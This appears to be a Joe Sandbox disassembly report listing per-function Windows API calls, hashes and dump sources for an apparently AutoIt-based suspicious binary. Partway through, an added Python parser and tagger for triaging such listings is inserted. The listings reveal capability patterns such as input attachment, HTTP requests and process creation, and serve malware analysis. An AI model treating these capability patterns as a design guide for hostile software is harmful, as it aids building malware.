                                                                    • Part of subcall function 00377CF4: EnterCriticalSection.KERNEL32(00000000,?,00377ADD,0000000D), ref: 00377D1F
                                                                  • __calloc_crt.LIBCMT ref: 0037ACD2
                                                                    • Part of subcall function 00376986: __calloc_impl.LIBCMT ref: 00376995
                                                                    • Part of subcall function 00376986: Sleep.KERNEL32(00000000,000003BC,0036F507,?,0000000E), ref: 003769AC
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0037ACED
                                                                  • GetStartupInfoW.KERNEL32(?,00406E28,00000064,00375E91,00406C70,00000014), ref: 0037AD46
                                                                  • __calloc_crt.LIBCMT ref: 0037AD91
                                                                  • GetFileType.KERNEL32(00000001), ref: 0037ADD8
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0037AE11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1426640281-0
                                                                  • Opcode ID: 1c1082eda6b0246865a3fd0f42fb0e0137d50214f1d89e99492662791d0a0d6a
                                                                  • Instruction ID: fc1aace9a54032ba03f14b4681f8a26449af15546384ef3b2b472b0f67866775
                                                                  • Opcode Fuzzy Hash: 1c1082eda6b0246865a3fd0f42fb0e0137d50214f1d89e99492662791d0a0d6a
                                                                  • Instruction Fuzzy Hash: 0681D671905B458FDB35CF68C84059DBBF4AF49320B24C26DD4AAEB7D1C7389802CB56
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00394047
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003930A5,?,00000001), ref: 0039405B
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00394062
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003930A5,?,00000001), ref: 00394071
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00394083
                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003930A5,?,00000001), ref: 0039409C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003930A5,?,00000001), ref: 003940AE
                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003930A5,?,00000001), ref: 003940F3
                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003930A5,?,00000001), ref: 00394108
                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003930A5,?,00000001), ref: 00394113
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: 07a76a9c0d9e24b6440444352ac83428a0dac00a1765af992d5b3c723beadce1
                                                                  • Instruction ID: 9fb31efa6b36e98f6afd6afde9e13b7819ebc32e215d2aa43e6a266c3a971688
                                                                  • Opcode Fuzzy Hash: 07a76a9c0d9e24b6440444352ac83428a0dac00a1765af992d5b3c723beadce1
                                                                  • Instruction Fuzzy Hash: 3031A572600204AFDF12DF64EC45FAA77ADFB54312F11C126F905D6290EBB4DD818BA4
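                                                                   The per-function API listings above (this one is the AttachThreadInput / GetForegroundWindow routine) are what a triager has to read hundreds of times in a report of this size. The following is an added example, not part of the Joe Sandbox report or its IDA plugin: a Python parser for the "APIs" / "Similarity" block format, a hypothetical rule table that tags each function by the capability its directly called API set implies (rule names are this example's own), and a helper that recovers the IcmpSendEcho timeout from the constant last argument (4000 ms here, 0xFA0). "Part of subcall function" lines are kept but marked as callee APIs so they do not pollute a function's own tag. The sample input is a constructed, abbreviated excerpt in the page's listing format.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the format of the Joe Sandbox IDA plugin listings on this
# page (abbreviated); it is test input for this example, not pasted report output.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00394047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,003930A5,?,00000001), ref: 0039405B
• GetWindowThreadProcessId.USER32(00000000), ref: 00394062
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003930A5,?,00000001), ref: 00394071
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• Instruction Fuzzy Hash: 3031A572600204AFDF12DF64EC45FAA77ADFB54312F11C126F905D6290EBB4DD818BA4
APIs
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003A8237
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 003A82C2
• WSACleanup.WSOCK32 ref: 003A82C8
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
APIs
• __lock.LIBCMT ref: 0037ACC1
  • Part of subcall function 00377CF4: EnterCriticalSection.KERNEL32(00000000,?,00377ADD,0000000D), ref: 00377D1F
• GetStartupInfoW.KERNEL32(?,00406E28,00000064,00375E91,00406C70,00000014), ref: 0037AD46
"""

# One "• Api.MODULE(args), ref: ADDR" line; the subcall prefix is optional.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_@][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # a concrete 32-bit constant argument

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int        # call-site address as printed by the plugin
    subcall: bool   # True for "Part of subcall function" lines (callee's APIs)

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""

    def direct_apis(self):
        return {c.api for c in self.calls if not c.subcall}

    def first_ref(self):
        refs = [c.ref for c in self.calls if not c.subcall]
        return min(refs) if refs else None

def parse_blocks(text):
    """Split the listing at each 'APIs' header and collect calls and similarity fields."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(raw)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                         int(m.group("ref"), 16), bool(m.group("sub"))))
        elif line.startswith("• API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            current.fuzzy_hash = line.split(":", 1)[1].strip()
    return blocks

# Assumed rule table (this example's own): tag -> APIs that must all be called directly.
RULES = (
    ("input-attach", {"AttachThreadInput", "GetForegroundWindow"}),   # joins the foreground window's input queue
    ("icmp-ping", {"IcmpSendEcho"}),
    ("drive-status-probe", {"GetDiskFreeSpaceW", "SetErrorMode"}),
    ("com-object-lookup", {"GetRunningObjectTable", "CoGetObject"}),
)

def tag_block(block):
    apis = block.direct_apis()
    return [name for name, needed in RULES if needed <= apis]

def arg_constants(call):
    """Concrete constants the plugin recovered for a call; '?' and symbolic args are dropped."""
    return [int(a, 16) for a in call.args if HEX8.match(a)]

def ping_timeout_ms(block):
    """IcmpSendEcho's 8th parameter is Timeout in milliseconds (IPHLPAPI signature)."""
    for c in block.calls:
        if c.api == "IcmpSendEcho" and len(c.args) == 8 and HEX8.match(c.args[-1]):
            return int(c.args[-1], 16)
    return None

def triage(text):
    """(first call-site address, tags) for every function that matched a rule."""
    out = []
    for b in parse_blocks(text):
        tags = tag_block(b)
        if tags and b.first_ref() is not None:
            out.append((f"{b.first_ref():08X}", tags))
    return out

if __name__ == "__main__":
    for ref, tags in triage(SAMPLE):
        print(ref, ", ".join(tags))
```

                                                                   Run against a whole report export, the `triage` output is a short list of call-site addresses to open in the disassembler instead of the full listing; the rule table is the place to encode what matters for the sample at hand (here, AutoIt runtime routines that this binary inherits from its interpreter rather than malware-specific code).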
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0036B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0036B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0036B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0036B4BD
                                                                  • GetClientRect.USER32(?), ref: 003CDD63
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 003CDD7A
                                                                  • GetWindowDC.USER32(?), ref: 003CDD86
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 003CDD95
                                                                  • ReleaseDC.USER32(?,00000000), ref: 003CDDA7
                                                                  • GetSysColor.USER32(00000005), ref: 003CDDC5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3430376129-0
                                                                  • Opcode ID: 66ecee7c5ff418456fa3ea3d74284e4f620caba4ddcfa087860733794b1fb256
                                                                  • Instruction ID: 7a76136e855df76e8e3204904a68450d5e9d14dd75bcdfd6a488ca1fc4c4279e
                                                                  • Opcode Fuzzy Hash: 66ecee7c5ff418456fa3ea3d74284e4f620caba4ddcfa087860733794b1fb256
                                                                  • Instruction Fuzzy Hash: 8D117931501205AFDB636BB4FC08FA97F6AEB05321F118266FA66950E2CB314991DF20
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003530DC
                                                                  • CoUninitialize.OLE32(?,00000000), ref: 00353181
                                                                  • UnregisterHotKey.USER32(?), ref: 003532A9
                                                                  • DestroyWindow.USER32(?), ref: 003C5079
                                                                  • FreeLibrary.KERNEL32(?), ref: 003C50F8
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003C5125
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: 57255549c9510c6bd3fd6f72b24a4933a0258b3200ca23bb3d0e1ef34badd15c
                                                                  • Instruction ID: 98b3b13d9d6336a530ab5592ceda5533ed0ebdf6a5d685218bfa09968b342f3f
                                                                  • Opcode Fuzzy Hash: 57255549c9510c6bd3fd6f72b24a4933a0258b3200ca23bb3d0e1ef34badd15c
                                                                  • Instruction Fuzzy Hash: 21912B746016028FC706EF24C895F68F3A8FF04345F5581A9E90AAB272DB30AE5ACF40
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 0036CC15
                                                                    • Part of subcall function 0036CCCD: GetClientRect.USER32(?,?), ref: 0036CCF6
                                                                    • Part of subcall function 0036CCCD: GetWindowRect.USER32(?,?), ref: 0036CD37
                                                                    • Part of subcall function 0036CCCD: ScreenToClient.USER32(?,?), ref: 0036CD5F
                                                                  • GetDC.USER32 ref: 003CD137
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003CD14A
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 003CD158
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 003CD16D
                                                                  • ReleaseDC.USER32(?,00000000), ref: 003CD175
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003CD200
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 2e8f8a35c303238dfa3f97ec8995488fac00ed2132bb09eb377b9ae6a18af969
                                                                  • Instruction ID: 168e3cc9c9d8d4d015b3365a8dfc2a6a62bc85857d813d42716e1b8813e6a09f
                                                                  • Opcode Fuzzy Hash: 2e8f8a35c303238dfa3f97ec8995488fac00ed2132bb09eb377b9ae6a18af969
                                                                  • Instruction Fuzzy Hash: 0071AB30500205DFCF239F64C885EBA7BB9FF48354F19826AF9959A6AAC7318C41DB50
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                    • Part of subcall function 0036B63C: GetCursorPos.USER32(000000FF), ref: 0036B64F
                                                                    • Part of subcall function 0036B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0036B66C
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000001), ref: 0036B691
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000002), ref: 0036B69F
                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 003BED3C
                                                                  • ImageList_EndDrag.COMCTL32 ref: 003BED42
                                                                  • ReleaseCapture.USER32 ref: 003BED48
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 003BEDF0
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003BEE03
                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 003BEEDC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                  • API String ID: 1924731296-2107944366
                                                                  • Opcode ID: b92e8dc91932addce7402fbc5cf9b8565a6bc7d963fd9fb42b176275221279b6
                                                                  • Instruction ID: 7b8783a895acadc5d4c445bbde648f01208dfb48a0828dadd35c896d6cde38e8
                                                                  • Opcode Fuzzy Hash: b92e8dc91932addce7402fbc5cf9b8565a6bc7d963fd9fb42b176275221279b6
                                                                  • Instruction Fuzzy Hash: 2251AD70104304AFD711DF24DC96FAA77E8FB88708F00892DFA959B2E1DB719948CB52
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003A45FF
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003A462B
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003A466D
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003A4682
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A468F
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003A46BF
                                                                  • InternetCloseHandle.WININET(00000000), ref: 003A4706
                                                                    • Part of subcall function 003A5052: GetLastError.KERNEL32(?,?,003A43CC,00000000,00000000,00000001), ref: 003A5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 1241431887-3916222277
                                                                  • Opcode ID: c6cadb5f57bf3ce415c46df7e703e020dd6043a63f24e270668515a044129ee3
                                                                  • Instruction ID: 0eeacade63035b489024aa66ba9b281d17c82c6aa587880c538f76fa8b793429
                                                                  • Opcode Fuzzy Hash: c6cadb5f57bf3ce415c46df7e703e020dd6043a63f24e270668515a044129ee3
                                                                  • Instruction Fuzzy Hash: FB417CB1501209BFEB139F54DC89FBB77ACFF4A314F004016FA059A191D7B09D448BA4
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003EDC00), ref: 003AB715
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003EDC00), ref: 003AB749
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003AB8C1
                                                                  • SysFreeString.OLEAUT32(?), ref: 003AB8EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: 23157bf293cb0c54f6bd225a73d0d9b817c15b47c417ea8271fbc8cd47c9b10c
                                                                  • Instruction ID: 971c91a51ad103aa1dcd653ca9d627f79be162847d96d18849dfb441e1d7df97
                                                                  • Opcode Fuzzy Hash: 23157bf293cb0c54f6bd225a73d0d9b817c15b47c417ea8271fbc8cd47c9b10c
                                                                  • Instruction Fuzzy Hash: B0F15E71A00209EFCF05DFA4C888EAEB7B9FF4A315F118459F905AB251DB31AE45CB90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003B24F5
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003B2688
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003B26AC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003B26EC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003B270E
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B286F
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003B28A1
                                                                  • CloseHandle.KERNEL32(?), ref: 003B28D0
                                                                  • CloseHandle.KERNEL32(?), ref: 003B2947
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                  • String ID:
                                                                  • API String ID: 4090791747-0
                                                                  • Opcode ID: 1a03fc55ab622f1ff8290d643b9ff0d16f82d92953a0886b5d63422399f1c5a7
                                                                  • Instruction ID: 4a2bc5fb86cf1ccf12dd34447df15ff232a09363e7b92ddfd46856726688acd1
                                                                  • Opcode Fuzzy Hash: 1a03fc55ab622f1ff8290d643b9ff0d16f82d92953a0886b5d63422399f1c5a7
                                                                  • Instruction Fuzzy Hash: A0D1B131604300DFCB26EF24C851BAABBE5AF85314F15895EF9999F6A2DB30DC44CB52
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003BB3F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 696f57acbfc3385367cbe0165c1fc0ea19d87d942a0ff51eefa91889577e2a0e
                                                                  • Instruction ID: 5508228fd570a71d98f03d464a39936c153da4c7bad9d0708889cba403ba6751
                                                                  • Opcode Fuzzy Hash: 696f57acbfc3385367cbe0165c1fc0ea19d87d942a0ff51eefa91889577e2a0e
                                                                  • Instruction Fuzzy Hash: 1D516074600204BBEB339B29DC85BE9BBA8BB0531CF644012F759DA9A1DBF1E9508B51
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003CDB1B
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CDB3C
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003CDB51
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003CDB6E
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003CDB95
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0036A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003CDBA0
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003CDBBD
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0036A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003CDBC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1268354404-0
                                                                  • Opcode ID: 7e1ae673f049e6e411172708cb0e4aef486a6b9114149d1415b1c480ce10dab6
                                                                  • Instruction ID: d86388680fba72cc6446122b7c98c2c5e12c5da07d1abb2734eccc90ae5a5bf0
                                                                  • Opcode Fuzzy Hash: 7e1ae673f049e6e411172708cb0e4aef486a6b9114149d1415b1c480ce10dab6
                                                                  • Instruction Fuzzy Hash: ED517B70600608EFDB22DF64DC81FAA77B9AB08354F114529F906EB6A0D7B0ED80DF50
                                                                  APIs
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00395FA6,?), ref: 00396ED8
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00395FA6,?), ref: 00396EF1
                                                                    • Part of subcall function 003972CB: GetFileAttributesW.KERNEL32(?,00396019), ref: 003972CC
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 003975CA
                                                                  • _wcscmp.LIBCMT ref: 003975E2
                                                                  • MoveFileW.KERNEL32(?,?), ref: 003975FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
